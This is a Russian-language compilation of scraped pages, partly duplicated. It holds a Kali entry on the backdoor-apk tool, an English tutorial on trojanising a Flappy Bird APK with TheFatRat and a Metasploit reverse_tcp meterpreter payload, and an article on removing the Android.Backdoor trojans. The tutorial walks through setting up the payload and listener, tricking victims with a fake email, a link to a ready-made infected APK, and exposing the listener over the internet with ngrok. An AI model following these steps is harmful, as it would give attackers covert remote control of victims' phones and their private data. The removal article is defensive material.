- Инструменты Kali Linux
- Список инструментов для тестирования на проникновение и их описание
- backdoor-apk
- Описание backdoor-apk
- Справка по backdoor-apk
- Руководство по backdoor-apk
- Примеры запуска backdoor-apk
- Установка backdoor-apk
- Установка в Kali Linux
- Скриншоты backdoor-apk
- Инструкции по backdoor-apk
- davidlares / ANDROID.md
- Инструменты Kali Linux
- Список инструментов для тестирования на проникновение и их описание
- backdoor-apk
- Описание backdoor-apk
- Справка по backdoor-apk
- Руководство по backdoor-apk
- Примеры запуска backdoor-apk
- Установка backdoor-apk
- Установка в Kali Linux
- Скриншоты backdoor-apk
- Инструкции по backdoor-apk
- Android Backdoor 114, 183 Origin – как удалить со смартфона или планшета опасный вирус
- Что такое Android Backdoor 114 и 183
- Android Backdoor 114 Origin – как удалить
Инструменты Kali Linux
Список инструментов для тестирования на проникновение и их описание
backdoor-apk
Описание backdoor-apk
backdoor-apk – это шелл скрипт, который упрощает процесс добавления бэкдора в любой APK файл для Android.
Программа поставляется со сторонними компонентами android-sdk-linux, apktool и proguard5.2.1.
Автор: Dana James Traversie
Лицензия: Apache V2.0
Справка по backdoor-apk
У программы нет справки и только одна опция – имя первоначального файла APK, в который будет зашит бэкодр. Изменить настройки вы можете в первых строках файла backdoor-apk.sh. В них вы можете задать IP адрес и порт для связи с Metasploit, пути до сторонних модулей, имя «файла-крысы», путь до лога и некоторые другие опции:
Руководство по backdoor-apk
Страница man отсутствует.
Примеры запуска backdoor-apk
Внедрить бэкдор в APK файл (BaiduBrowser.apk):
Перекомпилированный APK вы найдёте в директории ‘original/dist‘. Установите этот APK на совместимое устройство Android, запустите его, и управляйте подключением meterpreter на указанном IP и порту.
Установка backdoor-apk
Установка в Kali Linux
Информация об установке в другие операционные системы будет добавлена позже.
Скриншоты backdoor-apk
Это утилита командной строки.
Инструкции по backdoor-apk
Ссылки на инструкции будут добавлены позже.
Источник
davidlares / ANDROID.md
Backdooring Android Apps with FatRat and Metasploit Framework
We have to set a point, mobile applications are a HUGE market today. Many entrepreneurs left behind web-based experiences for building disruptive mobile solutions. The battle of smart-phones remains today between IOs and Android. Both have pros and cons, they are designed and configured with default security settings that maybe not the ideal for non-experienced people.
This writing demonstrates a practical and simple example on how to generate a Reverse TCP back-door on an existing APK file.
This is a pretty common «Social Engineering Attack», and it’s focused on generating a reverse TCP connection, where the attacker easily can generate shell access to your Android phone in the time you are using the infected application and do some harmful stuff or access your private information without any concern.
And when a mean “Social Engineering Attacks” is because the way it propagates, I’ll explain in a bit how are the typical phases of this attacks.
This demo was created on a controller and local lab, but it can be done on WAN networks easily.
Social Engineering (in simple words)
n order to explain the concept very clearly, we can split the term into two elements, where Social can set up as personal and professional lives, Engineering refers to performing tasks by following certain steps to achieving targets. That combined.
Social Engineering is a term that describes nontechnical intrusion that relies heavily on human interaction by tricking other people to break normal security procedures.
It’s pretty simple, really. It’s all about mocking or tricking people to use or download a Malware and take advantage of it for malicious purposes.
Social Engineering Phases
The attack can be summarized in something like this:
- Research: tries to gather information about the target, collected from various resources (dumpster living, website, docs, interactions).
- Hook: makes the initial move by trying to start a conversation with the selected target after the completion of the research phase.
- Play: make the relationship stronger and continue the dialog to exploit the relationship and get the desired information.
- Exit: walks out of the attack scene of stops the communication with the target without creating a scene or doing any suspicious.
The working Lab
A virtualized Kali Linux 2018.4 64 bits on Oracle Virtualbox.
A Samsung Galaxy S6 with Android 4.4 Kitkat with some regular security configurations.
Both machines where connected on the same LAN Network.
The key tool for this workshop is the FatRat Exploitation tool, this program written on Python, can easily generate backdoors on any existing Android application or almost any other device available with known payloads from the Metasploit Framework (and other payloads as well). This tool can perform a lot of other things, you can check the tool’s GitHub page here.
The installation process is quite simple, just keep in mind that can take some time because the dependencies installed.
Important: upgrade and update your Kali repositories before install it, this can save you time.
Great, let’s install FatRat:
Clone the repository from GitHub:
git clone https://github.com/Screetsec/TheFatRat.git
Inside the cloned repository, you will change the permissions on the setup.sh file for making it an executable file
chmod +x setup.sh && ./setup.sh
Follow the instructions
On the other side, we have the Metasploit Framework, this is an Open Source penetration tool used for developing and executing exploit code against remote target machines. Can be used to test vulnerabilities of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.
This amazing tool is already installed on the Kali Linux OS.
Let’s pause a bit.
At this moment (if this your first time hearing about Metasploit Framework) I’ll need to go deeper on this explanation, because, there are some key terms that may be a little bit confusing for you. I previously said that this tool is used to test vulnerabilities, right? A vulnerability is a weakness that can compromise the security of any system.
This vulnerability is exploited by using an exploit, this exploit refers to software code which allows an attacker to take advantage of a vulnerability.
And finally, when the vulnerability is exploited, the payload acts, this means, we run some code on the target system for enabling the exploitation to persist on time
With all that said. Let’s work.
Let’s download a clean APK
In this example, I downloaded the Flappy Bird APK from here
This is the authentic APK game.
I personally renamed the download name to a simple flappybird.apk file and move it from the downloads directory to a custom folder named backdooring-android (this is optional)
When I was installing FatRat on my Kali, the installer asked if I want to set the fatrat command globally, I said yes , this maybe can be differ from your process
- By typing fatrat the system will evaluate and configure the necessary and available services
- Type 5, for Backdooring Original apk [Instagram, Line,etc]
- Set up the Local Host (LHOST) and Local Port (LPORT). This will represent the Host machine IP address (Kali) and any unused port for hearing back the TCP session handshake (I’ll explain this later)
- Now, we have to type the location path of the flappybird.apk , in my case is on /root/backdooring-android/flappybird.apk
- Setting up the payload (Metasploit term) for the reverse TCP. Select the option 3: android/meterpreter/reverse_tcp
- Select 1: Use Backdoor-apk 0.2.2 this is the tool for creating the infected APK
And that’s it. Meanwhile FatRat will decompile the original APK and after some internal process will generate a new infected APK with the default name of app_backdoor.apk
After this, we set the generate the listener to no , we are going to generate it manually using Metasploit Framework
Creating the Listener manually
The second part of this attack consists of setting the Host Machine (Kali) as a listener on the bidirectional TCP connection, that’s the main purpose of Reverse TCP shell attack though Social Engineering. The attack will have shell access to the Android machine without the user notice.
Let’s start by starting the msfconsole command
After this, we set the multi/handler exploit like this
Later, setting the payload (the same on the FatRat process)
> set PAYLOAD android/meterpreter/reverse_tcp
> set LHOST [the same as your Kali IP]
> set LPORT [The same as FatRat process]
Checking the Apache service status (it’s already installed)
Starting the service
Placing the infected backdoor (renamed-or-not) for the victims
In this LAN network environment, the attacker needs to expose this new infected APK on the Apache Server to the victim, by sending a fake email with the link or any other way for tricking the people to download the new «FlappyBird.apk» on their Android device.
Once the victim downloads the application and opens it, a new session on the listener will be created successfully, using the meterpreter (payload) shell. The attacker have now the complete access to target custom attacks or perform some privilege escalation from the CLI.
You can list the sessions, like:
And you also can select and interact with an active session using the -i flag
My resulting APK
You can download my infected FlappyBird.apk file here
I’m not pretty sure if by setting your Kali machine with an static IP address just like the one I used to, can make this Malware works correctly. But, if it’s the case, my working IP address was a class C IP address 192.168.2.120 and the 4444 port.
From LAN to WAN
A simple way to scaling a local IP address is using a simple tunneling tool called ngRok. This tool convert a simple 127.0.0.1 to something accessible to all public.
Check the docs for installation steps and authtoken setup.
After that you can set the ngrok command for TCP connections, like:
> ngrok tcp 1234 for TCP protocol on the 1234 protocol
The whole process is the same, but you will need to replace the LHOST (Web interface from ngrok) and LPORT (the port from the ngrok TCP connection) to the elements that ngrok provided to you.
Источник
Инструменты Kali Linux
Список инструментов для тестирования на проникновение и их описание
backdoor-apk
Описание backdoor-apk
backdoor-apk – это шелл скрипт, который упрощает процесс добавления бэкдора в любой APK файл для Android.
Программа поставляется со сторонними компонентами android-sdk-linux, apktool и proguard5.2.1.
Автор: Dana James Traversie
Лицензия: Apache V2.0
Справка по backdoor-apk
У программы нет справки и только одна опция – имя первоначального файла APK, в который будет зашит бэкодр. Изменить настройки вы можете в первых строках файла backdoor-apk.sh. В них вы можете задать IP адрес и порт для связи с Metasploit, пути до сторонних модулей, имя «файла-крысы», путь до лога и некоторые другие опции:
Руководство по backdoor-apk
Страница man отсутствует.
Примеры запуска backdoor-apk
Внедрить бэкдор в APK файл (BaiduBrowser.apk):
Перекомпилированный APK вы найдёте в директории ‘original/dist‘. Установите этот APK на совместимое устройство Android, запустите его, и управляйте подключением meterpreter на указанном IP и порту.
Установка backdoor-apk
Установка в Kali Linux
Информация об установке в другие операционные системы будет добавлена позже.
Скриншоты backdoor-apk
Это утилита командной строки.
Инструкции по backdoor-apk
Ссылки на инструкции будут добавлены позже.
Источник
Android Backdoor 114, 183 Origin – как удалить со смартфона или планшета опасный вирус
Мы продолжаем публикацию материалов о вредоносном программном обеспечении и способах «лечения» заражённого устройства. Дело в том, что сейчас все чаще можно наблюдать картину, когда «троянец» уже предустановлен на телефон (планшет) в качестве одного из системных приложений. Как правило, их вредоносное воздействие осуществляется незаметно для владельца устройства.
Одним из таких «героев» и является Android.BackDoor – серия троянцев, которые заражают Андроид-устройства (об одном зловреде из этого семейства мы уже рассказывали на нашем сайте). Такие приложения предназначены для выполнения команд, поступающих от злоумышленников – будь то открывание URL, отправка СМС сообщений, сбор информации или загрузка опасных программ.
Что такое Android Backdoor 114 и 183
Android Backdoor 114 origin – одно из самых вредоносных приложений, появившееся совсем недавно. В прошлом году аналитики «Доктор Веб» впервые столкнулись с этой проблемой. Внедряясь в прошивку телефона (планшета), он стал головной болью тысяч пользователей, ведь стандартные способы борьбы здесь зачастую бессильны.
Бэкдор распространяется при помощи:
- безобидных приложений, модифицированных его создателями;
- предустановленного софта на Андроид.
В одном из последних сообщений о заражении, упоминается предустановленное приложение GoogleQuickSearchBox.apk, обнаруженное на планшете Oysters T104 HVi 3G.
Замечено, что троянец Android Backdoor 213 origin может транспортировать рассматриваемый бэкдор. При этом он удаляет одно из оригинальных приложений, находящихся в системном каталоге, а на его место устанавливается измененная версия, в которой находится Android Backdoor 114 origin.
На что же способно вредоносное приложение? Оно может собирать с зараженного объекта различную информацию и отправлять полученные данные на специальный (управляющий) сервер.
Стоит упомянуть, что спектр собираемой информации достаточно широк (зависит от модификации).
Злоумышленникам открывается доступ к следующим данным:
- IMEI-, IMSI-идентификатор и уникальные идентификаторы устройства, МАС-адреса (устройства и Bluetooth-передатчика);
- тип зараженного устройства и версия Андроид;
- параметры из конфигурации зараженного файла и название программного пакета, в котором он находится;
- API-версия операционной системы и тип сетевого подключения;
- перечень программ, которые находятся в системном каталоге или установленные пользователем;
- объем занятого и доступного места на внутренней памяти или флешке;
- название и производитель устройства, идентификатор страны;
- наименование и секретные коды операторов мобильной связи (Mobile Network Code, Mobile Country Code).
Основная же задумка мошенников состоит в том, чтобы обеспечить возможность активации такой опции, как «Установка приложений из неизвестного источника» и незаметная загрузка, а так же неконтролируемое удаление и установка программ.
В результате даже соблюдение всех мер безопасности не спасает владельца зараженного телефона. Бэкдор сумеет изменить необходимые настройки, чтобы загружать всевозможные вредоносные, нежелательные или рекламные приложения.
Например, Android Backdoor 183 origin – характеризуется установкой Time service и Monkey test, которые восстанавливаются после удаления с Андроид. Известен путь к этому приложению: /system/app/providerdown.
Android Backdoor 114 Origin – как удалить
Специалисты утверждают, что стандартные способы не принесут никакого результата. Тогда как удалить Android Backdoor Origin, представляющийся системным файлом? Для этого понадобится:
- приобрести полный root-доступ, что может быть крайне опасно, да и не всегда возможно;
- или установить «чистый» образ операционной системы, которая повлечет за собой потерю всей имеющейся информации, если нет резервной копии.
Общие рекомендации по лечению таковы:
Установить любое антивирусное приложение (к примеру, Dr.Web или avast! Mobile Security) и провести полное сканирование планшета (телефона), чтобы узнать путь, подлежащий удалению (в случае с Backdoor 114 это, скорее всего, будет /system/app/HTMLViewer.apk/).
Получить полные Root-права (поскольку мы будем иметь дело с системными приложениями);
найти и удалить вредоносный файл по адресу, который указал антивирус с помощью файлового менеджера, работающего с рут (Root Explorer (File Manager).
Ещё есть возможность (для лицензионных пользователей) – обратиться в службу тех. поддержки того же «Доктор Веб» с просьбой получить утилиту очистки.
Надеемся, что по прочтении этого материала вам удалось нейтрализовать вредоноса, однако владельцам Андроид стоит постоянно быть начеку и выполнять периодически антивирусное сканирование своего устройства, что позволит вовремя выявить и обезвредить опасные программы. Если же вирус обнаружен непосредственно в прошивке, лучше обратиться к производителю телефона (планшета) с просьбой о замене (обновлении) образа ОС.
Источник